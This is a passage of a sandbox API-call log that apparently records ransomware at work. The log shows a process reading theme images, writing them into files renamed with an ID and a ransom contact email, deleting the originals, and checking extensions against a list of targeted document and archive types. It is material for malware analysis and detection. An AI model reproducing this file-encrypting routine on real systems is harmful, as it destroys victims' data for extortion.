(lpString1=".1cd", lpString2=".PNG") returned -1 [0046.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0046.603] lstrlenW (lpString=".jpg") returned 4 [0046.603] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.604] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.604] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.604] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=945) returned 1 [0046.604] CloseHandle (hObject=0x198) returned 1 [0046.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20 [0046.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.604] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.604] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0046.808] GetLastError () returned 0x0 [0046.808] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x3b1, lpOverlapped=0x0) returned 1 [0046.810] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x3c0, lpOverlapped=0x0) returned 1 [0046.811] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.811] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.812] SetEndOfFile (hFile=0x204) returned 1 [0046.812] CloseHandle (hObject=0x204) returned 1 [0046.812] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.812] SetEndOfFile (hFile=0x198) returned 1 [0046.813] CloseHandle (hObject=0x198) returned 1 [0046.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.813] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1 [0046.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.813] lstrlenW (lpString=".doc") returned 4 [0046.813] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.813] lstrlenW (lpString=".docx") returned 5 [0046.813] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.813] lstrlenW (lpString=".pdf") returned 4 [0046.813] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.813] lstrlenW (lpString=".xls") returned 4 [0046.813] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.813] lstrlenW (lpString=".xlsx") returned 5 [0046.813] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.813] lstrlenW (lpString=".ppt") returned 4 [0046.813] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.813] lstrlenW (lpString=".zip") returned 4 [0046.814] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString=".rar") returned 4 [0046.814] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString=".bz2") returned 4 [0046.814] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.814] lstrlenW (lpString=".7z") returned 3 [0046.814] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString=".dbf") returned 4 [0046.814] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString=".1cd") returned 4 [0046.814] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString=".jpg") returned 4 [0046.814] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString=".doc") returned 4 [0046.814] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.814] lstrlenW (lpString=".docx") returned 5 [0046.814] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.814] lstrlenW (lpString=".pdf") returned 4 [0046.814] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString=".xls") returned 4 [0046.814] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString=".xlsx") returned 5 [0046.814] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.814] lstrlenW (lpString=".ppt") returned 4 [0046.814] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.814] lstrlenW (lpString=".zip") returned 4 [0046.814] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.815] lstrlenW (lpString=".rar") returned 4 [0046.815] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.815] lstrlenW (lpString=".bz2") returned 4 [0046.815] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.815] lstrlenW (lpString=".7z") returned 3 [0046.815] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.815] lstrlenW (lpString=".dbf") returned 4 [0046.815] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.815] lstrlenW (lpString=".1cd") returned 4 [0046.815] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0046.815] lstrlenW (lpString=".jpg") returned 4 [0046.815] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.815] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.815] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.815] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=3957) returned 1 [0046.815] CloseHandle (hObject=0x198) returned 1 [0046.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20 [0046.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.816] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.816] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0046.818] GetLastError () returned 0x0 [0046.818] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xf75, lpOverlapped=0x0) returned 1 [0046.819] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0046.820] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.820] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.820] SetEndOfFile (hFile=0x204) returned 1 [0046.820] CloseHandle (hObject=0x204) returned 1 [0046.821] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.821] SetEndOfFile (hFile=0x198) returned 1 [0046.821] CloseHandle (hObject=0x198) returned 1 [0046.821] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.822] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1 [0046.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.822] lstrlenW (lpString=".doc") returned 4 [0046.822] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.822] lstrlenW (lpString=".docx") returned 5 [0046.822] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.822] lstrlenW (lpString=".pdf") returned 4 [0046.822] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.822] lstrlenW (lpString=".xls") returned 4 [0046.822] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.822] lstrlenW (lpString=".xlsx") returned 5 [0046.822] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.822] lstrlenW (lpString=".ppt") returned 4 [0046.822] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.822] lstrlenW (lpString=".zip") returned 4 [0046.822] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.822] lstrlenW (lpString=".rar") returned 4 [0046.822] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.822] lstrlenW (lpString=".bz2") returned 4 [0046.822] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.822] lstrlenW (lpString=".7z") returned 3 [0046.822] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.822] lstrlenW (lpString=".dbf") returned 4 [0046.822] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".1cd") returned 4 [0046.823] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".jpg") returned 4 [0046.823] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".doc") returned 4 [0046.823] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.823] lstrlenW (lpString=".docx") returned 5 [0046.823] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.823] lstrlenW (lpString=".pdf") returned 4 [0046.823] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString=".xls") returned 4 [0046.823] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString=".xlsx") returned 5 [0046.823] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.823] lstrlenW (lpString=".ppt") returned 4 [0046.823] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".zip") returned 4 [0046.823] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString=".rar") returned 4 [0046.823] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.823] lstrlenW (lpString=".bz2") returned 4 [0046.823] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.823] lstrlenW (lpString=".7z") returned 3 [0046.823] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".dbf") returned 4 [0046.823] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.823] lstrlenW (lpString=".1cd") returned 4 [0046.823] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0046.824] lstrlenW (lpString=".jpg") returned 4 [0046.824] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.824] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.824] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.825] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=33277) returned 1 [0046.825] CloseHandle (hObject=0x198) returned 1 [0046.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20 [0046.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.825] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.825] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0046.825] GetLastError () returned 0x0 [0046.825] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x81fd, lpOverlapped=0x0) returned 1 [0046.827] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x8200, lpOverlapped=0x0) returned 1 [0046.829] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.829] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.829] SetEndOfFile (hFile=0x204) returned 1 [0046.829] CloseHandle (hObject=0x204) returned 1 [0046.829] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.829] SetEndOfFile (hFile=0x198) returned 1 [0046.830] CloseHandle (hObject=0x198) returned 1 [0046.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.830] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0046.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.830] lstrlenW (lpString=".doc") returned 4 [0046.831] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString=".docx") returned 5 [0046.831] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.831] lstrlenW (lpString=".pdf") returned 4 [0046.831] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString=".xls") returned 4 [0046.831] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.831] lstrlenW (lpString=".xlsx") returned 5 [0046.831] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.831] lstrlenW (lpString=".ppt") returned 4 [0046.831] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString=".zip") returned 4 [0046.831] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.831] lstrlenW (lpString=".rar") returned 4 [0046.831] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.831] lstrlenW (lpString=".bz2") returned 4 [0046.831] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString=".7z") returned 3 [0046.831] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString=".dbf") returned 4 [0046.831] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString=".1cd") returned 4 [0046.831] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString=".jpg") returned 4 [0046.831] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.831] lstrlenW (lpString=".doc") returned 4 [0046.831] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.831] lstrlenW (lpString=".docx") returned 5 [0046.832] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.832] lstrlenW (lpString=".pdf") returned 4 [0046.832] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.832] lstrlenW (lpString=".xls") returned 4 [0046.832] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.832] lstrlenW (lpString=".xlsx") returned 5 [0046.832] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.832] lstrlenW (lpString=".ppt") returned 4 [0046.832] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.832] lstrlenW (lpString=".zip") returned 4 [0046.832] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.832] lstrlenW (lpString=".rar") returned 4 [0046.832] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.832] lstrlenW (lpString=".bz2") returned 4 [0046.832] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.832] lstrlenW (lpString=".7z") returned 3 [0046.832] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.832] lstrlenW (lpString=".dbf") returned 4 [0046.832] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.832] lstrlenW (lpString=".1cd") returned 4 [0046.832] lstrcmpiW (lpString1=".1cd", 